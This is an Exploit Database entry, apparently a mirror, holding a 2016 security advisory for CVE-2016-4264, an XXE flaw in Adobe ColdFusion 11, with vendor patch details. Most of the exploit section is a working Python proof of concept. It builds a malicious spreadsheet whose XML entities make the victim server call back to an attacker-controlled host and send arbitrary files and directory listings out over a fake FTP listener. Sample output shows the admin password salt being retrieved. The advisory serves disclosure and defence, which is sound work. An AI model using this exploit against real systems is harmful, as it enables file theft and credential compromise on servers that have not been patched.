Adobe ColdFusion < 11 Update 10 - XML External Entity Injection

• Exploit Database
• 148 阅读

• 作者： Dawid Golunski
  日期： 2016-09-07
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/40346/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576

  &apos;&apos;&apos; ============================================= - Discovered by: Dawid Golunski - http://legalhackers.com - dawid (at) legalhackers.com   - CVE-2016-4264 - APSB16-30 - Release date: 31.08.2016 - Severity: Critical =============================================     I. VULNERABILITY -------------------------   Adobe ColdFusion <= 11 XML External Entity (XXE) Injection     II. BACKGROUND -------------------------   "Adobe ColdFusion 11 Enterprise Edition offers a single platform to rapidly build and deploy scalable, high-performing web and mobile applications. Leverage unique capabilities to develop, test, and debug mobile applications end to end. Generate high-quality PDF files and manipulate them easily."   http://www.adobe.com/products/coldfusion-family.html   ColdFusion is widely deployed. A google search for a ColdFusion index file (index.cfm) exposes over 30 million websites of various sectors that make use of ColdFusion platform in a visible way: https://www.google.com/?q=inurl:%2Findex.cfm including various government websites: https://www.google.com/search?q=inurl:index.cfm+site:gov     III. INTRODUCTION -------------------------   An independent research revealed that Adobe ColdFusion in versions 11 and below is vulnerable to XXE Injection when processing untrusted office documents.   Depending on web application&apos;s functionality and the attacker&apos;s ability to supply a malicious document to be processed by a vulnerable ColdFusion application, this vulnerability may potentially be exploited by both low-privileged and unauthenticated remote attackers.   This vulnerability can allow various attacks including:   - reading arbitrary files (stored on the server and within the network shares) - listing web/system directories - SSRF attacks / unauthorized access to restricted services running on the localhost as well as within the victim&apos;s server network - SMB relay attacks - temporary file uploads which may be used by attackers in combination with LFI vulnerabilities to supply malicious code   This advisory provides a PoC exploit that demonstrates how a remote attacker could read arbitrary files from the target server, as well as list directories.   Ability to read arbitrary files could for example let attackers extract sensitive information such as ColdFusion password hashes of the management console or stored database credentials. This could allow unauthorized access to weakly protected ColdFusion management interfaces and let attackers upload malicious code which could be used to fully compromise the server.     IV. DESCRIPTION -------------------------   The XXE vulnerability was found in the Office Open XML (OOXML) processing functions which are utilised when opening documents that use XML structure. Documents that are commonly stored in this format include:   - DOCX (Word documents) - XLSX (Excel spreadsheets) - PPTX (PowerPoint presentations)   More information about the format can be found in: https://en.wikipedia.org/wiki/Office_Open_XML   The vulnerability is caused by an unrestricted XML parser which allows for external XML entities processing when parsing such document.   Many web applications often accept OOXML documents from their users to process documents of various purposes, for example:   - invoices - bank statements - bills - tax forms - inventory - CVs / cover letters - application forms   etc.   Such upload functionality is often exposed to low-privileged or even unauthenticated remote users.   If an attacker is able to upload a specially crafted OOXML document which is later processed by an application written in Adobe ColdFusion, they may be able to perform various malicious actions including arbitrary file reading and directory listing as mentioned in the introduction.   This could for example be used by malicious users to read sensitive ColdFusion config files such as:   - neo-security.xml , which stores ColdFusion admin&apos;s password hash salt - password.properties , which stores admin&apos;s password hash - neo-datasource.xml , which stores database credentials   that are stored in c:\ColdFusion11\cfusion\lib\ directory by default on Windows installations.   Attackers might also access the application sourcecodes within the documentroot:   c:\ColdFusion11\cfusion\wwwroot   or access other sensitive system files available within the system.   As the vulnerability also allows browsing the filesystem and its directories, attackers may easily find interesting files and ColdFusion config/webroot directories even if the paths differ from the default ones.   Attackers who have gained access to password hashes could then proceed to cracking them in order to gain unauthorised access to the databases and ColdFusion administrator panels to fully compromise the target.   More information on hashes used by ColdFusion 11 can be found in the references below.   The next section presents a PoC exploit that can be used for file/directory retrieval. The exploit will work even if the target ColdFusion application does not return any data back to the attacker upon processing a malicious document file. The extracted data will be sent over the network back to the attacker as soon as the document file is processed.     V. PROOF OF CONCEPT EXPLOIT -------------------------   An example vulnerable ColdFusion application written in CFML language which loads a spreadsheet document could look as follows:     ---[ vulnerable.cfm ]---   <cfspreadsheet format="csv" action="read" src="https://www.exploit-db.com/exploits/40346/#expandPath( &apos;cf_poc_exploit.xlsx&apos; )#" name="xlsdoc" rows="1-4" />   <cfoutput>#xlsdoc#</cfoutput>   ------------------------     For simplicity, this ColdFusion application will load cf_poc_exploit.xlsx document from the current directory. In a real-world situation the application would allow a user to upload a document from their disk or alternatively fetch it from a URL.   Attacker could use the exploit below to prepare a malicious document and supply it to a vulnerable ColdFusion application.     ---[ ./cf_xxe_exploit.py ]--- &apos;&apos;&apos;   #!/usr/bin/python   intro = """ (CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit   This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be uploaded to a vulnerable ColdFusion application. It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080) in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet).   Discovered/Coded by:   Dawid Golunski http://legalhackers.com """ usage = """ Usage: The exploit requires that you have an external IP and can start web/http listeners on ports 8080/9090 on the attacking machine.   ./cf_xxe_exploit.py external_IP &apos;path_to_fetch&apos;   The example below starts an ftp listener on 192.168.1.40 (port 9090) and web server on 8080 and fetches c:\windows\win.ini file from the target.   ./cf_xxe_exploit.py 192.168.1.40 c:/windows/win.ini   The path can also be a directory to retrieve a directory listing e.g:   ./cf_xxe_exploit.py 192.168.1.40 c:/   will list the contents of drive C: on Windows   Disclaimer: For testing purposes only. Do no harm.   Full advisory URL: http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt """   import socket import subprocess import sys import web # http://webpy.org/installation import threading import time   # What file to retrieve from the victim server target_file = "c:/ColdFusion11/cfusion/lib/pass" # Web server (to serve XML) external_ip = &apos;192.168.57.10&apos; web_port = 8080 # File receiver ftp_port = 9090 timeout=5   # HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection class webserver(threading.Thread): def run (self): urls = (&apos;/passdata.xml&apos;, &apos;pass_xml&apos;) app = web.application(urls, globals()) #app.run() return web.httpserver.runsimple( app.wsgifunc(), (&apos;0.0.0.0&apos;, web_port))   # Pass data to ftp server using passdata.xml class pass_xml: def GET(self): print xxe_send_payload   # HTTP listener that will return intermediate XML (passdata.xml) in order to establish an ftp connection class webserver(threading.Thread): def run (self): urls = (&apos;/passdata.xml&apos;, &apos;pass_xml&apos;) app = web.application(urls, globals()) #app.run() return web.httpserver.runsimple( app.wsgifunc(), (&apos;0.0.0.0&apos;, web_port))   # Return helper xml/xxe payload to forward data class pass_xml: def GET(self): print "[+] Received GET /passdata.xml web request from the victim (%s) ! TARGET VULNERABLE to XXE !\n" % (web.ctx[&apos;ip&apos;]) return xxe_send_payload   def shutdown(code): print "[+] That&apos;s it folks :) Shutting down \n" web.httpserver.server.interrupt = KeyboardInterrupt() exit(code)     # [ Main Meat ]   print intro redirector_started = 0   if len(sys.argv) < 3 : print usage sys.exit(2)   # Overwrite settings with parameters from argv[] external_ip = sys.argv[1] target_file = sys.argv[2]   print "[+] Setting external IP to &apos;%s&apos; and target path to &apos;%s&apos;\n" % (external_ip, target_file)   # Prepare XXE payloads #OOXML XXE stub ooxml_xxe_payload = """<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE Types [ <!ENTITY % remote SYSTEM "http://_attackerhost_:_webport_/passdata.xml"> %remote;   ]> """ ooxml_xxe_payload = ooxml_xxe_payload.replace("_attackerhost_", external_ip) ooxml_xxe_payload = ooxml_xxe_payload.replace("_webport_", str(web_port))   # passdata.xml xxe_send_payload = """<!ENTITY % file1 SYSTEM "file:///_filepath_"> <!ENTITY % param1 &apos;<!ENTITY &#37; retrfile1 SYSTEM "ftp://cfhack:PoCexploit@_attackerhost_:_ftpport_/%file1;" >&apos; > %param1;   %retrfile1; """   xxe_send_payload = xxe_send_payload.replace("_filepath_", target_file) xxe_send_payload = xxe_send_payload.replace("_attackerhost_", external_ip) xxe_send_payload = xxe_send_payload.replace("_ftpport_", str(ftp_port))   # Create OXML spreadsheet file cf_poc_spreadsheet.xlsx with XXE payload f = open("[Content_Types].xml", "w") f.write(ooxml_xxe_payload ) f.close() cmd = "zip -r cf_poc_spreadsheet.xlsx &apos;[Content_Types].xml&apos; && rm -f &apos;[Content_Types].xml&apos;" process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (result, error) = process.communicate() rc = process.wait() if rc != 0: print "Error: failed to execute command:", cmd print error shutdown(3)   print "[+] Successfully created PoC spreadsheet with XXE payload in &apos;cf_poc_spreadsheet.xlsx&apos; file\n" print "[+] Starting our web server to serve XML on %s:%s \n" % (external_ip, web_port) webserver().start() time.sleep(1)   print &apos;\n[+] Starting FTP/data listener and waiting for connection on %s:%d\n&apos; % (external_ip, ftp_port) s = socket.socket() # Create/bind socket s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((external_ip, ftp_port))   print "[*] Upload the &apos;cf_poc_spreadsheet.xlsx&apos; spreadsheet document to the target ColdFusion app now...\n"   s.listen(5) # Wait for the victim to connect c, addr = s.accept()# Establish connection with the victim print &apos;\n[+] Got a connection from &apos;, addr, " to our FTP/data server. Meaning juicy data is on the way! :)\n" c.send("220 Welcome to ColdFusion XXE PoC exploit server\n")   print &apos;[+] Receiving data from the victim...\n&apos;   downloaded = ""   while True: data = "" c.settimeout(timeout) try: data = c.recv(1024) except socket.timeout: print "Timeout ! No more data\n" break   # extract data if data.startswith("CWD "): downloaded = downloaded + data[4:] if data.startswith("RETR "): downloaded = downloaded + data[5:]   print "Received packet: " + data #sys.stdout.write(&apos;.&apos;) #sys.stdout.flush()   if "USER" in data: c.send("331 password needed\n") elif "RETR" in data: c.send("550 No such file or directory.\n") break else: c.send(&apos;230 continue\n&apos;)   # Results print "\n\n[+] Here&apos;s the retrieved contents of the target file/directory (%s) : \n\n%s\n" % (target_file, downloaded)   # shutdown c.close()# Close the connection s.shutdown(0) s.close() shutdown(0)   &apos;&apos;&apos; -------------[eof]-----------     You can see the exploit in action in a PoC video at:   http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit   There are also two examples below:     A) Reading c:/ColdFusion11/cfusion/lib/neo-security.xml file which contains admin hash salt:     root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/cfusion/lib/neo-security.xml   (CVE-2016-4264) ColdFusion <= 11 XXE / Arbitrary File Read PoC exploit   This exploit produces a PoC OOXML spreadsheet document with XXE payload that can be uploaded to a vulnerable ColdFusion application. It starts up an ftp/data receiver (port 9090) as well as a web server (port 8080) in order to retrieve an arbitrary file from the victim (upon processing the PoC spreadsheet).   Discovered/Coded by:   Dawid Golunski http://legalhackers.com   [+] Setting external IP to &apos;192.168.57.10&apos; and target path to &apos;c:/ColdFusion11/cfusion/lib/neo-security.xml&apos;   [+] Successfully created PoC spreadsheet with XXE payload in &apos;cf_poc_spreadsheet.xlsx&apos; file   [+] Starting our web server to serve XML on 192.168.57.10:8080   http://0.0.0.0:8080/   [+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090   [*] Upload the &apos;cf_poc_spreadsheet.xlsx&apos; spreadsheet document to the target ColdFusion app now...   [+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE !   192.168.57.21:57219 - - [31/Aug/2016 20:12:06] "HTTP/1.1 GET /passdata.xml" - 200 OK   [+] Got a connection from(&apos;192.168.57.21&apos;, 57220)to our FTP/data server. Meaning juicy data is on the way! :)   [+] Receiving data from the victim...   Received packet: USER cfhack Received packet: PASS PoCexploit Received packet: TYPE I Received packet: CWD <wddxPacket version=&apos;1.0&apos;><header [cut]   [+] Here&apos;s the retrieved contents of the target file/directory (c:/ColdFusion11/cfusion/lib/neo-security.xml) :   <wddxPacket version=&apos;1.0&apos;><header [cut] struct>< var><var name=&apos;admin.userid.root.salt&apos;><string>A54B28011C6AC37F4D65B7D608D40722DAD6CDF25A943C809492637D2CC6265F< string>< var><var name=&apos;rds.enabled&apos;><string>false< [cut]     [+] That&apos;s it folks :) Shutting down     ~~~~~~~~~~~~     B) Listing the contents of the c:/ColdFusion11/ directory:     root@trusty:~/exploit# ./cf_xxe_exploit.py 192.168.57.10 c:/ColdFusion11/   [cut] [+] Setting external IP to &apos;192.168.57.10&apos; and target path to &apos;c:/ColdFusion11/&apos;   [+] Successfully created PoC spreadsheet with XXE payload in &apos;cf_poc_spreadsheet.xlsx&apos; file   [+] Starting our web server to serve XML on 192.168.57.10:8080   http://0.0.0.0:8080/   [+] Starting FTP/data listener and waiting for connection on 192.168.57.10:9090   [*] Upload the &apos;cf_poc_spreadsheet.xlsx&apos; spreadsheet document to the target ColdFusion app now...   [+] Received GET /passdata.xml web request from the victim (192.168.57.21) ! TARGET VULNERABLE to XXE !   192.168.57.21:57245 - - [31/Aug/2016 20:14:06] "HTTP/1.1 GET /passdata.xml" - 200 OK   [+] Got a connection from(&apos;192.168.57.21&apos;, 57246)to our FTP/data server. Meaning juicy data is on the way! :)   [+] Receiving data from the victim...   Received packet: USER cfhack   Received packet: RETR Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log cf_app.ico   [cut]   [+] Here&apos;s the retrieved contents of the target file/directory (c:/ColdFusion11/) :   Adobe_ColdFusion_11_Install_08_30_2016_19_59_04.log cf_app.ico cfusion config jre license.html Readme.htm uninstall     [+] That&apos;s it folks :) Shutting down       VI. BUSINESS IMPACT -------------------------   The vulnerability can be abused by low-privileged or unauthenticated remote attackers depending on application&apos;s functionality and lead to sensitive information disclosure. It can allow attackers to read arbitrary files or expose internal services running on the server and within the local network.   Attackers could for example read stored password hashes or database credentials which may aid attackers with gaining access to ColdFusion admin interface. Extracting application sourcecodes could also be of use to attackers and help them to find other vulnerabilities to fully compromise an affected target.   VII. SYSTEMS AFFECTED -------------------------   ColdFusion installations before:   - ColdFusion 11 Update 10 - ColdFusion 10 Update 21   are affected by this vulnerability.   VIII. SOLUTION -------------------------   Update to ColdFusion 11 Update 10 which include critical hotfixes released by the vendor upon initial private disclosure to Adobe. Alternatively users can upgrade their installation to ColdFusion 2016 which is not affected.   The vulnerability fix/advisory has been assigned APSB16-30 id by Adobe.   Links to the critical Adobe hotfix patches can be found in the references below.     IX. REFERENCES -------------------------   http://legalhackers.com http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt http://legalhackers.com/exploits/cf_xxe_exploit_CVE-2016-4264.py   PoC exploit video: http://legalhackers.com/videos/ColdFusion-XXE-PoC-Exploit   https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4264 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4264   Adobe ColdFusion critical hotfix/vuln announcement: https://helpx.adobe.com/security/products/coldfusion/apsb16-30.html   Info on ColdFusion configs and used hashes: http://www.openwall.com/lists/john-users/2015/06/07/1 https://helpx.adobe.com/coldfusion/kb/purpose-location-xml-configuration-files.html https://blogs.adobe.com/psirt/?p=1395   http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers   Lockdown guides: http://www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf11/cf11-lockdown-guide.pdf     X. CREDITS -------------------------   The vulnerability has been discovered by Dawid Golunski   dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY -------------------------   31.08.2016 - advisory released 01.09.2016 - corrections applied 07.09.2016 - added PoC video XII. LEGAL NOTICES -------------------------   The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. &apos;&apos;&apos;